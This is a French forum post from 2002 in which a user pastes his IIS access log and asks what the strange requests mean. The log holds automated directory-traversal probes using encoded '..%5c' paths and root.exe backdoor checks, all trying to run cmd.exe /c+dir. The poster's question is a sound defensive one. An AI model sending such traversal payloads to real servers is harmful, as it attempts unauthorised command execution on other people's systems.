Salut,
Est-ce que qq un peu me dire a quoi correspond ce log ? car je comprend pas pkoi il y a des accés a mon serveur IIS alors que personne ne connait l'adresse Ce qui me pose problème c'est de savoir a quoi correspondent ces commandes
Code :
- 2002-09-26 10:14:31 212.194.250.xx - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 10:14:39 212.194.250.xx - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
- 2002-09-26 10:14:47 212.194.250.xx - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 10:14:54 212.194.250.xx - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 10:15:01 212.194.250.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 10:15:09 212.194.250.xx - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 10:15:18 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 10:15:26 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 10:15:34 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 10:15:42 212.194.250.xx - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:05:41 212.194.209.xxx - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
- 2002-09-26 12:05:47 212.194.209.xxx - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
- 2002-09-26 12:05:53 212.194.209.xxx - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:06:00 212.194.209.xxx - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:25 213.37.28.x - 127.0.0.1 80 GET /scripts/root.exe /c+dir 404 -
- 2002-09-26 12:54:27 213.37.28.x - 127.0.0.1 80 GET /MSADC/root.exe /c+dir 403 -
- 2002-09-26 12:54:31 213.37.28.x - 127.0.0.1 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:33 213.37.28.x - 127.0.0.1 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:34 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:54:38 213.37.28.x - 127.0.0.1 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:54:48 213.37.28.x - 127.0.0.1 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:49 213.37.28.x - 127.0.0.1 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
- 2002-09-26 12:54:51 213.37.28.x - 127.0.0.1 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:54:51 213.37.28.x - 127.0.0.1 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:56 213.37.28.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:58 213.37.28.x - 127.0.0.1 80 GET /winnt/system32/cmd.exe /c+dir 404 -
- 2002-09-26 12:54:59 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:54:59 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:55:01 213.37.28.x - 127.0.0.1 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
- 2002-09-26 12:55:05 213.37.28.x - 127.0.0.1 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
|
edit: j'ai mis des "xxx" a la place de la fin des adresses IP au cas où
Message édité par Webman le 26-09-2002 à 19:20:17